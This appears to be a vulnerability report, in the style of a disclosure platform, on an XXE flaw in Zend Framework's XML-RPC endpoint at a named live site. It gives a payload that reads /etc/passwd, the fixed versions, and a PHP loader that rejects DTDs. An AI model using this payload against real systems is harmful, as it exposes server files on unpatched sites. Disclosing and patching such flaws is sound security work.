URL: http://www.etam.com.cn/api/xmlrpc
Post Data:
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT methodName ANY>
<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<methodCall>
<methodName>&xxe;</methodName>
</methodCall>
Vulnerability proof: the response returned the contents of /etc/passwd.
Solution:
1. Check the underlying XML parsing library in use and make sure external entity parsing is disabled by default;
2. Apply the patch:
Affected versions: 1.11.11, 1.12.0 RC1, 2.0.0 beta4, and earlier versions.
Fixed versions: 1.11.12, 1.12.0 RC2, 2.0.0 beta5.
Upgrade to the fixed release corresponding to your version.
Upgrade address links:
http://framework.zend.com/
http://framework.zend.com/download/latest
http://packages.zendframework.com/
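Solution item 1 asks that the XML parser never resolve external entities. As an added example that is not Zend Framework's own code, the PHP request loader below refuses any XML-RPC body that carries a DOCTYPE or ENTITY declaration and keeps libxml's external entity loader off; the function name and the two constructed request bodies are assumptions.

```php
<?php
// Added example, not Zend Framework's code: a hardened XML-RPC request loader.
// The report's payload works only when the parser substitutes entities
// (LIBXML_NOENT) while libxml's external entity loader is enabled; this
// loader does neither and rejects DTDs outright. Name is hypothetical.
function loadXmlRpcRequest(string $xml): string
{
    // Cheap textual pre-check so an inline DTD never reaches the parser.
    // (An encoding trick could evade it, so the DOM-level check below stays.)
    if (stripos($xml, '<!DOCTYPE') !== false || stripos($xml, '<!ENTITY') !== false) {
        throw new InvalidArgumentException('DOCTYPE/ENTITY declarations are not allowed');
    }
    // Before PHP 8.0 the external entity loader is on by default; turn it off
    // (this is process-wide state, so set it once at bootstrap in real code).
    if (PHP_VERSION_ID < 80000) {
        libxml_disable_entity_loader(true);
    }
    libxml_use_internal_errors(true);

    $dom = new DOMDocument();
    // LIBXML_NONET forbids network fetches; LIBXML_NOENT is deliberately
    // absent so entity references are never substituted.
    if (!$dom->loadXML($xml, LIBXML_NONET)) {
        throw new InvalidArgumentException('Malformed XML-RPC request');
    }
    // Legitimate XML-RPC never needs a DTD, so any doctype node is refused.
    if ($dom->doctype !== null) {
        throw new InvalidArgumentException('DOCTYPE declarations are not allowed');
    }
    $node = $dom->getElementsByTagName('methodName')->item(0);
    if ($node === null || trim($node->textContent) === '') {
        throw new InvalidArgumentException('Missing methodName');
    }
    return trim($node->textContent);
}

// Constructed requests: a normal call and one shaped like the report's payload.
$requests = [
    'benign' => '<?xml version="1.0"?><methodCall><methodName>system.listMethods</methodName></methodCall>',
    'xxe'    => '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
              . '<methodCall><methodName>&xxe;</methodName></methodCall>',
];

foreach ($requests as $label => $xml) {
    try {
        printf("%s: method=%s\n", $label, loadXmlRpcRequest($xml));
    } catch (InvalidArgumentException $e) {
        printf("%s: rejected (%s)\n", $label, $e->getMessage());
    }
}
```

The benign request yields the method name; the DOCTYPE-bearing one is rejected before libxml ever evaluates the entity.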